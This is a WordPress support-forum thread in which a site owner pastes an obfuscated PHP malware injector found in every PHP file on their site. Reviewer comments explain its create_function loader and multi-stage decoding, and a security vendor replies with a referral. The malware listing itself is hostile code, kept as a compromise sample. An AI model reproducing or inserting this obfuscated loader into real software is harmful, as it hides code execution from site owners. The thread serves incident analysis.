• Resolved wpdevart

    (@wpdevart)


    Hi dear team.

    We got this type of malware; this piece of code was added to every PHP file:

    <?php
    /*
     * SECURITY NOTE (review): this is an obfuscated PHP injector exactly as it was
     * pasted into the forum.  The forum rendering replaced straight quotes with
     * typographic ones and stripped the backslashes from escapes such as "\x27"
     * (left here as " x27"), so the listing no longer parses; it is kept verbatim
     * as an indicator-of-compromise sample, not as runnable code.
     *
     * Loader structure (everything up to the closing quote, four lines down, is
     * one payload string, $zlerqbhc):
     *   - a 34-byte slice at offset 5926 of the payload, split on 'x', yields
     *     "STrrEv", "NoITCnuF_EtaeRC" and "ECaLPer_RtS"; PHP resolves function
     *     names case-insensitively, so the first is strrev(), and strrev() of
     *     the other two gives create_function() and str_replace();
     *   - ywvybrjs() walks $kaaimrq as (offset, length) pairs, concatenates
     *     those slices of the payload, then str_replace()s chr(9) (tab) with
     *     chr(92) (backslash) to produce the second-stage PHP source.  The
     *     largest pair, 5871+55, ends exactly at 5926 where the name slice
     *     starts;
     *   - that source is compiled with create_function("", ...) and invoked on
     *     the last line.  create_function() was removed in PHP 8.0, so this
     *     stage only runs on older interpreters.
     *
     * Readable fragments of the second stage are visible inside the payload
     * text: $_SERVER["HTTP_USER_AGENT"] (spelled with mixed \x-hex and octal
     * escapes), strstr($uas, "msie"), strstr($uas, "rv:11"), a third strstr()
     * whose argument begins "and" (truncated in the paste), function_exists
     * ("ob_start"), $GLOBALS["anuna"] set to 1 as a run-once guard,
     * @error_reporting(0), and implode(array_map("pv…", str_split("…"))) fed to
     * a second create_function() — i.e. a third stage decoded by a helper that
     * appears to be chr(ord($n)-1), which matches the many shifted-by-one words
     * in the payload ("gvodujpo" -> "function", "sfuvso" -> "return").  The
     * user-agent tests suggest browser-targeted behaviour, but what the final
     * stage actually does is not recoverable from this sample.
     *
     * Triage: search every PHP file for "ywvybrjs", "zlerqbhc" or "anuna",
     * restore from a known-clean copy, rotate all credentials, and check the
     * access logs around the files' modification times — the sample itself does
     * not reveal the initial entry point.
     */
    $zlerqbhc = ‘3]321]464]284]364]6]234]342]58]24]31#-%tdz*Wsfuvso!)!gj!|!*1?hmg%)!gj!<**2-4-bubE{ofuopdufhfmjg}[;ldpt%}K;ufldpt}X;ms;0]=])0#)U! x27{**u%-#jt0}Z;0]=]0#)2q%l}S%rxB%epnbss!>!bssbz)#44ec:649#-!#:618d5f9#-!#f6c6<!%ff2!>!bssbz) x24]25 x24- x24-!% x24- x24*!|! x24- x24 x5c%j^ x24!>2<!gps)%j>1<%j=6[%ww2!>#p#/#p#/%z<jg!)%z>>2*!uofuopD#)sfebfI{*w%)kVx{**#k#)tutjyfx x22l:!}V;3q%}U;y]}R;2]7;!}6;##}C;!>>!}W;utpi}Y;tu!>!%yy)#}#-# x24- x24-tusqpt)%z-#:#* x24- x24!>! x24/%j%!*72! x27!hmg%)!gj!<2,*j%-#1]#-bubE{h%)tpqsut>j%!*9! x27!hmgM5]DgP5]D6#<%fdy>#]D4]27%)uqpuftmsvd},;uqpuftmsvd}+;!>!} x27;!>>>!}_;gvc%}&;ftmbg} x748y]#>s%<#462]47y]252]18y]#>q%<#762]67y]562]38y]585:6197g:74985-rr.93e:5597f-s.973:A x27pd%6<pd%w6Z6<.4hA x27pd%6<pd%w6Z6<.3hA x27pd%6<pd%w},;osvufs} x27;mnui}&;zepc}A;~!} x7f;!|!}{;)gj}l;33bq}k;opjudovg}x]245]K2]285]Ke]53Ld]53]Kc]55Ld]55#*<%bG9}:}.}-}!#*<%nfd>%fdy<Cb*[%hsbq%)323ldfidk!~!<**qvd}R;*msv%)}.;UQPMSVD!-idx24- x24<%j,,*!| x24- x24gvodujpo! x24- x24y7 e:4:|:**#ppde#)tutjyf4 x223}!+!<+{e%+*!*+fepdfe{h+{7y]37]88y]27]28y]#/r%/h%)n%-#+I#)e>u%V<#65,47R25,d7R17,67R37,#/q%>U<#16,47R-j%-bubE{h%)sutcvt-#w#)ldbqov>*ofmy%)utjm!|!*5! x27!hmg%qjA)qj3hopmA x273qj%6<*Y%)fnbozcYufhA x272qj%6<^#zsfvr# x5cq%7/7#@#tjw/ x24)% x24- x24y4 x24- x24]y8 x24- x24]26 ($_SERVER[" x48 124 x54 120 x5f 125 x53 105 x52 137 x41 10%7**^#zsfvr# x5cq%)ufttj x22)gj6<^#Y# x5cq% x27Y%6<.msv:.2^,%b:<!%c:>%s: x5c%j:^<!%w x5c^>Ew:Qb:Qc:W~!%z%)!gj!~<ofmy%,3,j%>j%!<**3x7fw6*CW&)7gj6<.[A x27&6< x7fw6* x7f_*#[k2{6:!}*K)ftpmdXA6|7**197-2qj%7-K)udfoopdXA x22)7gj6ftsbqA7>q%6< x7fw6* x7f_*#fubfsdXk5{66~6<]K4]65]D8]86]y31]278]y3f]2>j%!|!*#91y]c9y]g2y]#>>*4-7f_*#ujojRk3{666~6<&w6< judovg<~ x24<!%o:!>! x242178}527}88:}334}472 x24I&b%!|!*)323zbek!~!<b% x7f!<X>b%Z<#opop%!-uyfu%)3of)fepdof57ftidsbbj+upcotn+qsvmt+fmhpph#)zbscB%iN}#-! 
x24/%tmw/ x24)%c*W%eN+#Qi x5c1^W%c!>!%i {h%)j{hnpd!opjudovg!|!**#j{hnpd#)tut83:48984:71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%tpz!>!#d/#)rrd/#00;quui#>.%!<***f x27,*e x27,*d x27,*c x27,*b x2yf x27*&7-n%)utjm6< x7fw6*CW&)7gd%)+opjudovg+)!gj+{e%!osvufs!*!+A!>!{e%)!>> x22!ftmbg)!gj<*#k#)usbu7 x45 116 x54″]); if ((strstr($uas,” x6d 163 x69 145″)%tww**WYsboepn)%bss-%rxB%h>#]y31]278]y3e]81]K78:569,Bjg!)%j:>>1*!%b:>1<!fmtf!%b:>%s: x5c%j7)fepdof.)fepdof./#@#/qp%>5h%!<*::::::-111112)eobsun>qp%x24- x24*<! x24- x24gps)%j>1<%j=tj{fpg)% x24- x24*<!~! x24/%t2;2-u%!-#2#/#%#/#o]#/*)323zbe!-#jt0*?]+^?]_ x5c}X x24<!%t72]48y]#>m%:|:*r%:-t%)3of:op#>b%!*##>>X)!gjZ<#opo#>b%!**X)ufttj x22)gj!|!*nb!>!%tdz)%bbT-%bT-%hW~%#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-#W#-7&6<.fmjgA x27doj%6< x7fw6* x7f_*#fmjgk4{6~6<tfs%w6< x7fw6*CWtfsc1^-%r x5c2^-%hOh/#00#W~!%t2w)##Qtjw)#]82#-#!#-%tmw256]y81]265]y72]254]y76#<!%w:!>!(%w:!>! x246767~6<Cw6<pd%w6Z6<.5h3]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<%tdz>#L4]275L3]248L3P6L1M5<*qp%-*.%)euhA)3of>2bd%!<5h%/#0#/*#np1-bubE{h%)sutcvt)!gj!|!*bubE x27tfs%6<*17-SFEBFI,6<*127-UVPFNJU,6<*27-SFGTOBSUOS%t2w>#]y74]273]y76]252]y85]256]y6g]257]y86]267]y74]275]y7:]268]y!|Z~!<##!>!2p%!|!*!***b%)sfxpmpusut!-#j0#!7/7^#iubq# x5cq% x27jsv%6<C>^#zsfvr# x5cqs:~928>> x22:ftmbg39*56A:>:8:|:7#6#)tutjyf439275tJGB)fubfsdXA x27K6< x7fw6*3qj%7> x2272qj%)7gj6<**2qj%)hopm3}#-%o:W%c:>1<%b:>1<!gps)%j:>1<%j:=tj{fpg)%s:*<%j:, $ehdgdom = implode(array_map("pvusfs27&6<*rfs%7-K)fujsxX6<#o]o]Y%<*QDUMPT7-NBFSUTLDPT7-UFO)) or (strstr($uas," x72 166 x3a 61 x31")) or (strst]D6M7]K3#<%yy>#]D6]281L1#/##C#-#O#-#N#*-!%ff2-!%t::**<(<!fwbm)%tjw)# x24#-!#]y38#-!%w:**<")57,27R66,#/q%>2q%<#g6R85,67R37,18R#>q%V<*#fopoV;hojepdoF.l} x27;%!<*#}_;#)323lmw!>!#]y84]275]y83]273]y76]277#<!usfsj($n){return chr(or7f#<!%tww!>! 
x2400~:<h%_t%:osvufs:~:<*9-1-r%)s%>/h%:<**#57]38y]47]6dfid>}&;!osvufs} x7f;!opjudovg}k~~9{d%:osvuf6Z6<.2hA x27pd%6<C x27pd%6|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqdovg)!gj!|!*msv%)}k~~~<ftmbg!osvufs!|sb!-#}#)fepmqnj!/!#0#)idubnhfsq)!sp!*#ojneb#-*f%)r($uas," x61 156 x64&w6< x7fw6*CW&)7gj6<*doj%7-C)fepmqnjA x2tfsqnpdov{h19275j{hnpd19275fubmgoj{h1:|:*mmvo:>:iuhofm%:-5ppdfdy)##-!#~<%h00#*<%nfd)##Qtpz)#]341]88M4P8]37]25d816:+946:ce44#)zbssftmf!~<**9.-j%-bubE{h%)sutcvt)fubmgoj{hA!osvuif((function_exists(" x6f 142 x5f 163 x74 141 x72 164- x24tvctus)% x24- x24b78]225]241]334]368]322]3]364]6]283]427]36]373P6]36]73]83]238M7]38w/ x24)##-!#~<#/% x24- x24!>!fyqmpef)# x24*<!%t::!>! x24Ypp3)%1]211M5]67]452]88]5]48]32M3]317]445]212]445]4%bss x5csboe))1/35.)1/14+9**-)1/2986+7**^/%rx<~!!%s:NmfV x7f<*XAZASV<*w%)ppdd($n)-1);} @error_reporting(0);]D2P4]D6#<%G]y6d]281Ldz-1H*WCw*[!%rN}#QwTW%hIr x58399#-!#65egb2dc#*<!sfuvso!sb1 x74 145 x5f 146 x75 156 x63 164 x69 157 x6e"; function pv<^2 x5c2b%!>!2p%!*3>?*2b%)gpf{jt)!gj!<*2bd%-#1GO x22#)fepmqyfA>2b%!sfxpmpusut)tpqssutRe%)Rd%)Rb%))!gj!<*#cd2bge56+99386c6f+9f%)7gj6<*id%)ftpmdR6<*id%)dfyfRVUFS,6<*msv%7-MSV,6<*)ujojR x27id%6< x7fw6* x!hmg%!)!gj!<2,*j%!-#1]#-bubE{h%)tpqsut><##:>:h%:<#64y]552]e7y]#>n%<#372]58y]472]37y]672]51L3]84]y31M6]y3e]81#/#7e:55946-tr.984:759oepn)%epnbss-%rxW~!Ypp2)%));$mbmlllf = $esnyokx("", $ehdgdom); $mbmlllf();}}7;utpI#7>/7rfs%6<#o]1/20QUUI7jsv%7UFH# x27rfs%6~6< x7fw6<j",str_split("%tjw!>!#]y84]275]y83]248]y83]j6<*K)ftpmdXA6~6<u%7>/7&6|7**111127-K)ebfsX x27u%)7fmjix6<C xx5c2^<!Ce*[!%cIjQeTQcOc/#00#W~!Ydrr) 162 x6f 151 x64"))) { $esnyokx = " x63 162 x65 14tcpV x7f x7f x7f x7f<u%V x27{ftmfV x7f<*X&Z&S{fth%)sutcvt)esp>hmg%!<1″) && (!isset($GLOBALS[” x61 156 x75 1q%:>:r%:|:**t%)m%=*h%)m%):fmjix:b!>!ssbnpe_GMFTQIQ&f_UTPIQUUI&e_SEEBFUPNFS&d_S8297f:5297e:56-xr.985:52985-t.98f;!osvufs}w;* x7f!>> x22!pd%)!gj}Z;h!opjudovg}{;#)tutjyfopjujyfopjudovg x22)!gj}1~!<2p% x7f!~!<##!>!2p%Zfs!~<3,j%>j%!*3! 
x27bc x7f!|!*uyfu x27k:!ftmf!}Z;^nbsbq% x5/!**#sfmcnbs+yfeobz+sfwjFSFGFSQUUI&c_UOFHBSFTVQUU56 x61″])))) { $GLOBALS[” x61 156 x75 156 x61″]=1; $uas=strtolower%z>3<!fmtf!%z>2<!%ww2)%wTW~ x24<!fwbm)%tjw)bssbz)#P#-#Q#-#B#-#T#-#E#-zB%z>! x24/%tmw/ x24)%zW%h>EzH,2W%wN;#-EcSFWSFT%}X;!sp!*#opo#>>}R;msv}.;/#/#/},;#-#}+;%-qp%)54STrrEvxNoITCnuF_EtaeRCxECaLPer_RtSiddlkhtu’;
// chr(120) is 'x'; the 34-byte slice at offset 5926 of the payload holds the
// three helper names, case-mangled: "STrrEv", "NoITCnuF_EtaeRC", "ECaLPer_RtS".
$yewvasnw=explode(chr((375-255)),substr($zlerqbhc,(38864-32938),(223-189)));
// $yewvasnw[0] is strrev; reversing the other two gives create_function and
// str_replace (PHP resolves the variable function names case-insensitively).
$dajstlnv = $yewvasnw[0]($yewvasnw[(7-6)]);
$aoplzhs = $yewvasnw[0]($yewvasnw[(8-6)]);
if (!function_exists(‘ywvybrjs’)) {
    /**
     * Reassemble the second-stage source from the payload.
     *
     * @param array  $pnfoabgofn flat list of (offset, length) pairs into $zyxuph
     * @param string $zyxuph     the obfuscated payload ($zlerqbhc)
     * @param string $jberlvbk   name of the replace function (resolves to str_replace)
     * @return string the concatenated slices with chr(9) (tab) replaced by chr(92) (backslash)
     */
    function ywvybrjs($pnfoabgofn, $zyxuph,$jberlvbk) {
        $zpckzk = NULL;
        // sizeof()/2 pairs: even index = offset into the payload, odd index = length
        for($nhkaxzyw=0;$nhkaxzyw<(sizeof($pnfoabgofn)/2);$nhkaxzyw++) {
            $zpckzk .= substr($zyxuph, $pnfoabgofn[($nhkaxzyw*2)],$pnfoabgofn[($nhkaxzyw*2)+(7-6)]);
        }
        // chr(9) = tab, chr(92) = backslash: tabs in the payload stand in for
        // the backslashes of the decoded source.
        return $jberlvbk(chr((52-43)),chr((490-398)),$zpckzk);
    };
}
// chr(44) is ','. This is the (offset, length) table consumed by ywvybrjs();
// its last pair, 5871+55, ends exactly where the helper-name slice begins.
$kaaimrq = explode(chr((142-98)),’4112,53,5327,38,5695,66,1279,58,2120,53,3339,52,3878,20,5207,50,4545,59,3593,23,4436,31,3246,37,5067,43,2693,66,699,58,3727,64,2021,32,5110,61,3283,29,5010,57,1516,45,3312,27,3136,60,1166,67,3045,41,1337,55,1561,43,3898,40,2577,65,4729,30,2887,52,4759,45,1656,25,1468,48,386,27,82,39,911,26,553,63,5478,61,3791,37,4067,45,5584,20,4804,39,467,62,1442,26,1110,56,51,31,5306,21,1629,27,2859,28,1874,36,5539,45,4604,67,2822,37,1964,57,2264,57,3003,42,5643,24,1792,32,3828,50,4671,58,4046,21,5397,49,5667,28,1729,38,2467,48,890,21,1767,25,5604,39,5871,55,3539,21,3683,44,3086,50,3938,61,983,52,2053,67,5257,49,4413,23,1068,42,3482,57,325,61,757,66,121,41,2383,56,3560,33,2939,64,3616,67,1035,33,5365,32,4843,49,616,49,2439,28,1681,48,211,67,4165,23,413,54,1233,46,937,46,2321,62,4253,62,1824,50,5171,36,162,49,4516,29,4934,25,5831,40,4489,27,2642,51,2173,52,665,34,5446,32,1604,25,4892,42,1910,54,3391,27,529,24,2759,63,4467,22,823,67,2515,22,3999,47,4188,65,4315,45,0,30,30,21,4360,53,3196,50,2225,39,1392,50,278,47,5761,70,2537,40,3418,64,4959,51′);
// create_function("", <second stage>) compiles the reassembled source into an
// anonymous function; nothing from the payload has executed yet at this point.
$svvzia = $dajstlnv(“”,ywvybrjs($kaaimrq,$zlerqbhc,$aoplzhs)); 
// Overwrite the decoder-name variable with the payload, run the second stage,
// then clobber both variables with small integers (121 and 120) — presumably
// to leave less of the decoded chain behind for anyone inspecting the process.
$dajstlnv=$zlerqbhc; $svvzia(“”); $svvzia=(376-255); $zlerqbhc=$svvzia-1; ?>

    We don’t know what this is.

    Can someone help us find where this malware came from?

    Thanks in advance.

  • Hi there,

    Unfortunately, the point of entry can’t be determined from a code sample alone — that evidence lives in the server’s access logs and file-modification history, not in the injected code. Also, as this forum is only for plugin usage support, I’ll need to refer you to our contact page, where you can report security issues to our Research Team: https://sucuri.net/company/contact-us

    Thanks!
    eve@sucuri
